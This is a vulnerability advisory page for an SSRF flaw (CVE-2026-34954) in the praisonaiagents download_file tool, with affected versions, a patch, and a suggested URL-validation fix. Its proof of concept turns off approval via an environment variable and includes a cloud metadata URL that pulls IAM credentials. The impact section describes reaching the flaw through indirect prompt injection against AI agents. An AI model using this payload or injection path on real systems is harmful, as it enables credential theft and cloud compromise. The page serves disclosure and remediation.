AI Threat Alert AI Threat Alert

CVE-2026-34954

GHSA-44c2-3rw4-5gvh HIGH
Published April 1, 2026

### Summary `FileTools.download_file()` in `praisonaiagents` validates the destination path but performs no validation on the `url` parameter, passing it directly to `httpx.stream()` with `follow_redirects=True`. An attacker who controls the URL can reach any host accessible from the server...

Full CISO analysis pending enrichment.

Affected Systems

Package Ecosystem Vulnerable Range Patched
praisonaiagents pip <= 1.5.94 1.5.95

Do you use praisonaiagents? You're affected.

Severity & Risk

CVSS 3.1
8.6 / 10
EPSS
N/A
KEV Status
Not in KEV
Sophistication
N/A

Recommended Action

Patch available

Update praisonaiagents to version 1.5.95

Compliance Impact

Compliance analysis pending. Sign in for full compliance mapping when available.

Technical Details

NVD Description

### Summary `FileTools.download_file()` in `praisonaiagents` validates the destination path but performs no validation on the `url` parameter, passing it directly to `httpx.stream()` with `follow_redirects=True`. An attacker who controls the URL can reach any host accessible from the server including cloud metadata services and internal network services. ### Details `file_tools.py:259` (source) -> `file_tools.py:296` (sink) ```python # source -- url taken directly from caller, no validation def download_file(self, url: str, destination: str, ...): # sink -- unvalidated url passed to httpx with redirect following with httpx.stream("GET", url, timeout=timeout, follow_redirects=True) as response: ``` ### PoC ```bash # tested on: praisonaiagents==1.5.87 (source install) # install: pip install -e src/praisonai-agents # start listener: python3 -m http.server 8888 import os os.environ['PRAISONAI_AUTO_APPROVE'] = 'true' from praisonaiagents.tools.file_tools import download_file result = download_file( url="http://127.0.0.1:8888/ssrf-test", destination="/tmp/ssrf_out.txt" ) print(result) # listener logs: "GET /ssrf-test HTTP/1.1" 404 # on EC2 with IMDSv1: url="http://169.254.169.254/latest/meta-data/iam/security-credentials/" # writes IAM credentials to destination file ``` ### Impact On cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service and write them to disk for subsequent agent steps to exfiltrate. `follow_redirects=True` enables open-redirect chaining to bypass partial URL filters. Reachable via indirect prompt injection with no authentication required. ### Suggested Fix ```python from urllib.parse import urlparse import ipaddress BLOCKED_NETWORKS = [ ipaddress.ip_network("127.0.0.0/8"), ipaddress.ip_network("169.254.0.0/16"), ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("172.16.0.0/12"), ipaddress.ip_network("192.168.0.0/16"), ] def _validate_url(url: str) -> None: parsed = urlparse(url) if parsed.scheme not in ("http", "https"): raise ValueError(f"Scheme {parsed.scheme!r} not allowed") try: addr = ipaddress.ip_address(parsed.hostname) for net in BLOCKED_NETWORKS: if addr in net: raise ValueError(f"Requests to {addr} are not permitted") except ValueError as e: if "does not appear to be" not in str(e): raise ```

Weaknesses (CWE)

CWE-918 Server-Side Request Forgery (SSRF) Primary

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

References

Timeline

Published
April 1, 2026
Last Modified
April 1, 2026
First Seen
April 2, 2026
Back to Threat Feed